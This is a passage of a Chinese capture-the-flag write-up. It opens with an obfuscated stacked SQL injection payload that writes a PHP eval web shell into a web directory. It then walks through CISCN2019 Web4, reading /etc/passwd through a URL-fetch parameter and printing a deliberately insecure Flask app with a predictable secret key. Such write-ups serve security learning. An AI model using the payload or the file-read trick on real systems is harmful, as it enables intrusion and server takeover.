?id=2;set @sql=char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59);prepare query from @sql;execute query;

然后直接连接

得到 flag

[CISCN2019 华东南赛区]Web4

2021.1.22

考点

做题步骤

点击后跳转

猜测可能有是代码执行。

看看能不能直接找flag 不能获取。

然后想到的是看看能不能看到 /etc/passwd 的内容

可以读取，且发现我们最后有个路径为 /app

应该是一个 python flask 的

读取 app.py的内容发现有回显

# encoding:utf-8
import re, random, uuid, urllib
from flask import Flask, session, request

app = Flask(__name__)
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)
app.debug = True

@app.route('/')
def index():
    session['username'] = 'www-data'
    return 'Hello World! <a href="/read?url=https://baidu.com">Read somethings</a>'

@app.route('/read')
def read():
    try:
        url = request.args.get('url')
        m = re.findall('^file.*', url, re.IGNORECASE)
        n = re.findall('flag', url, re.IGNORECASE)
        if m or n:
            return 'No Hack'
        res = urllib.urlopen(url)
        return res.read()
    except Exception as ex:
        print str(ex)
    return 'no response'

@app.route('/flag')
def flag():
    if session and session['username'] == 'fuck':
        return open('/flag.txt').read()
    else:
        return 'Access denied'

if __name__=='__main__':
    app.run(
        debug=True,
        host="0.0.0.0"
    )